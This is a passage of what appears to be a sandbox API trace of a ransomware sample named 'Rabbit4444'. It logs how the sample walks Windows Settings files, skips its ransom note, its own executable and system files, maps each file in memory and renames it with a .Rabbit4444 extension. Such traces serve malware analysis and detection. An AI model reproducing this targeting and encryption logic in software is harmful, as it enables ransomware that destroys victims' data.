(lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_VirtualDesktops_TaskbarFilter.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_virtualdesktops_taskbarfilter.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.149] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.149] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14945934857) returned 1 [0058.149] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1277) returned 1 [0058.149] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0058.149] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0058.149] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x298 [0058.150] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x70000 [0058.151] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.151] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0058.151] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.151] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0058.151] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.151] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0058.151] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.151] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0058.151] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14946207989) returned 1 [0058.151] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0058.151] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0058.151] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.152] CloseHandle (hObject=0x298) returned 1 [0058.152] CloseHandle (hObject=0x278) returned 1 [0058.152] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_VirtualDesktops_TaskbarFilter.settingcontent-ms.Rabbit4444") returned 194 [0058.152] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_VirtualDesktops_TaskbarFilter.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_virtualdesktops_taskbarfilter.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_VirtualDesktops_TaskbarFilter.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_virtualdesktops_taskbarfilter.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.152] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e78d775, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3e78d775, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x50d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Workplace_CorpDeviceManagement.settingcontent-ms", cAlternateFileName="AA0F9C~1.SET")) returned 1 [0058.152] lstrcmpiW (lpString1="AAA_SystemSettings_Workplace_CorpDeviceManagement.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.152] lstrcmpiW (lpString1="AAA_SystemSettings_Workplace_CorpDeviceManagement.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.153] lstrcmpiW (lpString1="AAA_SystemSettings_Workplace_CorpDeviceManagement.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.153] lstrcmpiW (lpString1="AAA_SystemSettings_Workplace_CorpDeviceManagement.settingcontent-ms", lpString2=".") returned 1 [0058.153] lstrcmpiW (lpString1="AAA_SystemSettings_Workplace_CorpDeviceManagement.settingcontent-ms", lpString2="..") returned 1 [0058.153] lstrcmpiW (lpString1="AAA_SystemSettings_Workplace_CorpDeviceManagement.settingcontent-ms", lpString2="windows") returned -1 [0058.153] lstrcmpiW (lpString1="AAA_SystemSettings_Workplace_CorpDeviceManagement.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.153] lstrcmpiW (lpString1="AAA_SystemSettings_Workplace_CorpDeviceManagement.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.153] lstrcmpiW (lpString1="AAA_SystemSettings_Workplace_CorpDeviceManagement.settingcontent-ms", lpString2="boot") returned -1 [0058.153] lstrcmpiW (lpString1="AAA_SystemSettings_Workplace_CorpDeviceManagement.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.153] lstrcmpiW (lpString1="AAA_SystemSettings_Workplace_CorpDeviceManagement.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.153] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Workplace_CorpDeviceManagement.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Workplace_CorpDeviceManagement.settingcontent-ms") returned="AAA_SystemSettings_Workplace_CorpDeviceManagement.settingcontent-ms" [0058.153] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Workplace_CorpDeviceManagement.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.153] lstrlenW (lpString="AAA_SystemSettings_Workplace_CorpDeviceManagement.settingcontent-ms") returned 67 [0058.153] lstrlenW (lpString="Rabbit4444") returned 10 [0058.153] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.153] lstrlenW (lpString=".dll") returned 4 [0058.153] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.153] lstrlenW (lpString=".lnk") returned 4 [0058.153] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.153] lstrlenW (lpString=".ini") returned 4 [0058.153] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.153] lstrlenW (lpString=".sys") returned 4 [0058.153] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.153] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Workplace_CorpDeviceManagement.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_workplace_corpdevicemanagement.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.154] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.154] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14946441581) returned 1 [0058.154] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1293) returned 1 [0058.154] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0058.154] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0058.154] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x810, lpName=0x0) returned 0x298 [0058.155] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x810) returned 0x70000 [0058.156] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.156] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0058.156] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.156] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0058.156] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.156] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0058.156] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.156] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0058.156] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14946696819) returned 1 [0058.156] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0058.156] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0058.156] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.156] CloseHandle (hObject=0x298) returned 1 [0058.156] CloseHandle (hObject=0x278) returned 1 [0058.157] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Workplace_CorpDeviceManagement.settingcontent-ms.Rabbit4444") returned 195 [0058.157] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Workplace_CorpDeviceManagement.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_workplace_corpdevicemanagement.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Workplace_CorpDeviceManagement.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_workplace_corpdevicemanagement.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.157] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e931156, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3e931156, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a0254b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4ec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Workplace_RelatedSettings.settingcontent-ms", cAlternateFileName="AA1419~1.SET")) returned 1 [0058.157] lstrcmpiW (lpString1="AAA_SystemSettings_Workplace_RelatedSettings.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.157] lstrcmpiW (lpString1="AAA_SystemSettings_Workplace_RelatedSettings.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.157] lstrcmpiW (lpString1="AAA_SystemSettings_Workplace_RelatedSettings.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.157] lstrcmpiW (lpString1="AAA_SystemSettings_Workplace_RelatedSettings.settingcontent-ms", lpString2=".") returned 1 [0058.157] lstrcmpiW (lpString1="AAA_SystemSettings_Workplace_RelatedSettings.settingcontent-ms", lpString2="..") returned 1 [0058.157] lstrcmpiW (lpString1="AAA_SystemSettings_Workplace_RelatedSettings.settingcontent-ms", lpString2="windows") returned -1 [0058.157] lstrcmpiW (lpString1="AAA_SystemSettings_Workplace_RelatedSettings.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.158] lstrcmpiW (lpString1="AAA_SystemSettings_Workplace_RelatedSettings.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.158] lstrcmpiW (lpString1="AAA_SystemSettings_Workplace_RelatedSettings.settingcontent-ms", lpString2="boot") returned -1 [0058.158] lstrcmpiW (lpString1="AAA_SystemSettings_Workplace_RelatedSettings.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.158] lstrcmpiW (lpString1="AAA_SystemSettings_Workplace_RelatedSettings.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.158] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Workplace_RelatedSettings.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Workplace_RelatedSettings.settingcontent-ms") returned="AAA_SystemSettings_Workplace_RelatedSettings.settingcontent-ms" [0058.158] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Workplace_RelatedSettings.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.158] lstrlenW (lpString="AAA_SystemSettings_Workplace_RelatedSettings.settingcontent-ms") returned 62 [0058.158] lstrlenW (lpString="Rabbit4444") returned 10 [0058.158] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.158] lstrlenW (lpString=".dll") returned 4 [0058.158] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.158] lstrlenW (lpString=".lnk") returned 4 [0058.158] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.158] lstrlenW (lpString=".ini") returned 4 [0058.158] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.158] lstrlenW (lpString=".sys") returned 4 [0058.158] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.158] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Workplace_RelatedSettings.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_workplace_relatedsettings.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.159] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.159] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14946945382) returned 1 [0058.159] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1260) returned 1 [0058.159] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0058.159] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0058.159] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x298 [0058.160] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x70000 [0058.161] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.161] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0058.161] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.161] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0058.161] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.161] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0058.161] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.161] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0058.161] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14947198688) returned 1 [0058.161] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0058.161] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0058.161] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.161] CloseHandle (hObject=0x298) returned 1 [0058.161] CloseHandle (hObject=0x278) returned 1 [0058.162] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Workplace_RelatedSettings.settingcontent-ms.Rabbit4444") returned 190 [0058.162] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Workplace_RelatedSettings.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_workplace_relatedsettings.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Workplace_RelatedSettings.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_workplace_relatedsettings.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.166] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ecc496e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3ecc496e, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2433f6fa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x332, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AddOrRemovePrograms.settingcontent-ms", cAlternateFileName="ADDORR~1.SET")) returned 1 [0058.173] lstrcmpiW (lpString1="AddOrRemovePrograms.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.173] lstrcmpiW (lpString1="AddOrRemovePrograms.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.173] lstrcmpiW (lpString1="AddOrRemovePrograms.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.173] lstrcmpiW (lpString1="AddOrRemovePrograms.settingcontent-ms", lpString2=".") returned 1 [0058.173] lstrcmpiW (lpString1="AddOrRemovePrograms.settingcontent-ms", lpString2="..") returned 1 [0058.173] lstrcmpiW (lpString1="AddOrRemovePrograms.settingcontent-ms", lpString2="windows") returned -1 [0058.173] lstrcmpiW (lpString1="AddOrRemovePrograms.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.173] lstrcmpiW (lpString1="AddOrRemovePrograms.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.173] lstrcmpiW (lpString1="AddOrRemovePrograms.settingcontent-ms", lpString2="boot") returned -1 [0058.173] lstrcmpiW (lpString1="AddOrRemovePrograms.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.173] lstrcmpiW (lpString1="AddOrRemovePrograms.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.173] lstrcpyW (in: lpString1=0x130ec22, lpString2="AddOrRemovePrograms.settingcontent-ms" | out: lpString1="AddOrRemovePrograms.settingcontent-ms") returned="AddOrRemovePrograms.settingcontent-ms" [0058.173] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AddOrRemovePrograms.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.174] lstrlenW (lpString="AddOrRemovePrograms.settingcontent-ms") returned 37 [0058.174] lstrlenW (lpString="Rabbit4444") returned 10 [0058.174] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.174] lstrlenW (lpString=".dll") returned 4 [0058.174] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.174] lstrlenW (lpString=".lnk") returned 4 [0058.174] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.174] lstrlenW (lpString=".ini") returned 4 [0058.174] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.174] lstrlenW (lpString=".sys") returned 4 [0058.174] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.174] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AddOrRemovePrograms.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\addorremoveprograms.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.175] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.175] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14948539691) returned 1 [0058.175] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=818) returned 1 [0058.175] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0058.175] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0058.175] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x640, lpName=0x0) returned 0x298 [0058.177] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x640) returned 0x70000 [0058.178] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.178] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0058.178] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.178] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0058.178] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.178] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0058.178] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.178] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0058.178] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14948922749) returned 1 [0058.179] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0058.179] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0058.179] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.179] CloseHandle (hObject=0x298) returned 1 [0058.179] CloseHandle (hObject=0x278) returned 1 [0058.179] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AddOrRemovePrograms.settingcontent-ms.Rabbit4444") returned 165 [0058.179] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AddOrRemovePrograms.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\addorremoveprograms.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AddOrRemovePrograms.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\addorremoveprograms.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.179] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3eedaad1, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3eedaad1, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x232b5237, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{0042AE00-17CC-42EC-B5AD-B8F08A025D71}.settingcontent-ms", cAlternateFileName="CLASSI~1.SET")) returned 1 [0058.179] lstrcmpiW (lpString1="Classic_{0042AE00-17CC-42EC-B5AD-B8F08A025D71}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.180] lstrcmpiW (lpString1="Classic_{0042AE00-17CC-42EC-B5AD-B8F08A025D71}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.180] lstrcmpiW (lpString1="Classic_{0042AE00-17CC-42EC-B5AD-B8F08A025D71}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.180] 